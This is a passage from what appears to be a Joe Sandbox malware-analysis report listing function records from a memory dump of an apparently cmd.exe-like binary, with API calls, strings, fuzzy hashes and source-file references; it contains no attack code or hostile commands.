                              • API String ID: 95024817-2010427443
                              • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                              • Instruction ID: fdf1c9d199881771c3676fd1c97f271bcde98bc2271fcff13a2e8f64a7f1daab
                              • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                              • Instruction Fuzzy Hash: BD129232A0C682C6E764BF169480179F6A1FB89B54F885235EE4E577DCDF7DE8009B10
                              Function 00007FF744F05240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID: [...]$ [..]$ [.]$...$:
                              • API String ID: 0-1980097535
                              • Opcode ID: 2219ec0c8753013161cecaed1cdda4e0f6f768acbcc792b3dd0f248377f952d2
                              • Instruction ID: 00f86898cf6992f4a0ce273f20458596248873818a04d241eaec6b7694b1d6ac
                              • Opcode Fuzzy Hash: 2219ec0c8753013161cecaed1cdda4e0f6f768acbcc792b3dd0f248377f952d2
                              • Instruction Fuzzy Hash: 9B327D72A0CA82C6EB60FF6294942F9A7A0FB85784F894135DE0D476D9DF3CE505E720
                              Function 00007FF744F2EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                              Download Yara Rule
                              APIs
                              • _wcsupr.MSVCRT ref: 00007FF744F2EF33
                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EF98
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFA9
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFBF
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF744F2EFDC
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFED
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F003
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F022
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F083
                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F092
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F0A5
                              • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF744F2F0DB
                              • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F135
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F16C
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F185
                                • Part of subcall function 00007FF744F101B8: _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                                • Part of subcall function 00007FF744F101B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                              • String ID: <noalias>$CMD.EXE
                              • API String ID: 1161012917-1690691951
                              • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                              • Instruction ID: 8e4a8cec4821cebf0119f23b162a3bddd5efd156707fcef8d8f470724f2b7f88
                              • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                              • Instruction Fuzzy Hash: 20918122B0C652CAFB14BF62E4801BDAAA0BF49B55FDC4135DE0E526DDDF3DA445A230
                              Function 00007FF744F06EE4 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 342timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                              • String ID: %02d%s%02d%s%02d$%s $%s %s
                              • API String ID: 1795611712-4023967598
                              • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                              • Instruction ID: 00a7122d976a6dfdab02d3af5810ad778b63ba1105f0c3b544aed07b623874f4
                              • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                              • Instruction Fuzzy Hash: F0E18E21A0CA42C6EB10BF67A8855B9E6A1FB88784FD84131DE4E576DDDE3CE504A360
                              Function 00007FF744F032B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              • _get_osfhandle.MSVCRT ref: 00007FF744F032F3
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF744F032A4), ref: 00007FF744F03309
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF744F03384
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F211DF
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                              • String ID:
                              • API String ID: 611521582-0
                              • Opcode ID: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                              • Instruction ID: 7d0347e0f821baaf050b10e2ffad0585b0238758c56454e3d3d2112cf9cdec78
                              • Opcode Fuzzy Hash: eb4f65db57e5e21f7b3e544c495bce771b340a8d61a99cf5019a4a82effd2785
                              • Instruction Fuzzy Hash: 8EA18132B0C612CBF714BF62A8842BDEAA1FB89B55F895135CD0E467C8DF3C94459620
                              Function 00007FF744F01560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                              • String ID: \\?\
                              • API String ID: 628682198-4282027825
                              • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                              • Instruction ID: 7d174f70306791720fd56abefa33272099d4dcb233ab988f4dc7361472fbd2b7
                              • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                              • Instruction Fuzzy Hash: B0E1A122A0CA82C6EB64BF22D9942F9A3A0FB85749F885135DE0E477D8DF3CE545D310
                              Function 00007FF744F2AFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                              • String ID:
                              • API String ID: 16309207-0
                              • Opcode ID: f69c8bc93ff962dccf6457547a30940781d29ec0e45bba8a393ad22f284f6631
                              • Instruction ID: 967de81567634408d014a5a230a0f4b4da27cebfc5ddd452dc647d934abd8111
                              • Opcode Fuzzy Hash: f69c8bc93ff962dccf6457547a30940781d29ec0e45bba8a393ad22f284f6631
                              • Instruction Fuzzy Hash: 8B228022B19B82C6EB25BF22D8942F9A3A0FB49784F884135DE0E077D9DF3DE5459310
                              Function 00007FF744F03410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                              • String ID: $Application$System
                              • API String ID: 3538039442-1881496484
                              • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                              • Instruction ID: fb3304b0d049b738a2b2bc1478cf7d75c10707b42c61c608866b7f38550be3b3
                              • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                              • Instruction Fuzzy Hash: 72519832A0CB41D7EB20AF56B48427AFAA1FB89B45F898134EE4E03798DF3CD4459710
                              Function 00007FF744F2D9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                              Download Yara Rule
                              APIs
                              • longjmp.MSVCRT(?,?,00000000,00007FF744F2048E), ref: 00007FF744F2DA58
                              • memset.MSVCRT ref: 00007FF744F2DAD6
                              • memset.MSVCRT ref: 00007FF744F2DAFC
                              • memset.MSVCRT ref: 00007FF744F2DB22
                                • Part of subcall function 00007FF744F13A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F2EAC5,?,?,?,00007FF744F2E925,?,?,?,?,00007FF744F0B9B1), ref: 00007FF744F13A56
                                • Part of subcall function 00007FF744F05194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF744F051C4
                                • Part of subcall function 00007FF744F1823C: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F18280
                                • Part of subcall function 00007FF744F1823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F1829D
                                • Part of subcall function 00007FF744F101B8: _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                                • Part of subcall function 00007FF744F101B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                                • Part of subcall function 00007FF744F04FE8: _get_osfhandle.MSVCRT ref: 00007FF744F05012
                                • Part of subcall function 00007FF744F04FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F05030
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F2DDB0
                                • Part of subcall function 00007FF744F059E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F05A2E
                                • Part of subcall function 00007FF744F059E4: _open_osfhandle.MSVCRT ref: 00007FF744F05A4F
                              • _get_osfhandle.MSVCRT ref: 00007FF744F2DDEB
                              • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F2DDFA
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F2E204
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F2E223
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F2E242
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                              • String ID: %9d$%s$~
                              • API String ID: 3651208239-912394897
                              • Opcode ID: e6d30ee1a680604acc51b567a64b2b57e279b7d93a42c24935efe64c52d79538
                              • Instruction ID: 3e27f4b70ef236add8ea0c6855c24bba6eed2f7780c44f84837dbe2c085cc78a
                              • Opcode Fuzzy Hash: e6d30ee1a680604acc51b567a64b2b57e279b7d93a42c24935efe64c52d79538
                              • Instruction Fuzzy Hash: DB426F32A0C682CAFB64BF2298901E9B7A1FB85744F980136DE4D47ADDDF3DE9409710
                              Function 00007FF744F0CE10 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 337COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                              • String ID: GOTO
                              • API String ID: 3863671652-1693823284
                              • Opcode ID: e87969e6ebfccf29de2258abbc41600a6706c34826b1ed84fd1aaa5ba970b1f6
                              • Instruction ID: 6128ee3daa2622ea4e4e17231831ac76ea24a76756048577e2ab11b45cd01a36
                              • Opcode Fuzzy Hash: e87969e6ebfccf29de2258abbc41600a6706c34826b1ed84fd1aaa5ba970b1f6
                              • Instruction Fuzzy Hash: 97E18B21A0D682C6FB64BF17A4D8379A6A0AF85750FCC4135DE0E462DDEF3CE845A721
                              Function 00007FF744F0372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                              • String ID: COPYCMD$\
                              • API String ID: 3989487059-1802776761
                              • Opcode ID: 96accb7c683da629c5902687fcfdce68ec2ad7ffcff5cd83664200e6c3670c7a
                              • Instruction ID: 2423bf0947e54e0e447656f296e11105eb886405a7c33302ab48210610a42a28
                              • Opcode Fuzzy Hash: 96accb7c683da629c5902687fcfdce68ec2ad7ffcff5cd83664200e6c3670c7a
                              • Instruction Fuzzy Hash: E4F1B466A0C746C2EB64BF1795842BAA3A1FF85B88F884135CE4E477D8EE3DE445D310
                              Function 00007FF744F31538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                              • String ID:
                              • API String ID: 3935429995-0
                              • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                              • Instruction ID: cb51bb44a9ca32ddad11f678f595a0e95cf7b92bd1ee9cd79aad57f1cc0df176
                              • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                              • Instruction Fuzzy Hash: C461AD26A0C652C7E750FF22A58457AFBA4FB89F55F898134DE4A43798DF3CD401A710
                              Function 00007FF744F13140 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 229timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$File$System$FormatInfoLocalLocale
                              • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                              • API String ID: 55602301-695310191
                              • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                              • Instruction ID: 7dde6f2d5a9dd0fd39fb38a2ea79c0409b202d777f4e787c1d088ec93709e775
                              • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                              • Instruction Fuzzy Hash: 5CA16D22A1C642D6FB10BF12E4802BAA7B5FB94754F980135EE5E436D8EF3CE944E710
                              Function 00007FF744F035B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                              • Instruction ID: a94f878ba3252cfc79afc96fd8d4d9737a5a035d82f4768fec7cb432b4138c53
                              • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                              • Instruction Fuzzy Hash: F891F23260CA82C6EB24BF66D5902FDB6A0FB85746F884131DE4E467D8DF3DD544E220
                              Function 00007FF744F0B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _get_osfhandlememset$wcschr
                              • String ID: DPATH
                              • API String ID: 3260997497-2010427443
                              • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                              • Instruction ID: a3cbf8519cde4e4ea3caa9446122dcc39e050c5ca6d0f57631b90ca20cad4cfd
                              • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                              • Instruction Fuzzy Hash: 5ED17E22A1C682C6EB25BF66D484179A3A1FB84B94F884235DE1D477DDDF3CE841E360
                              Function 00007FF744F17FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
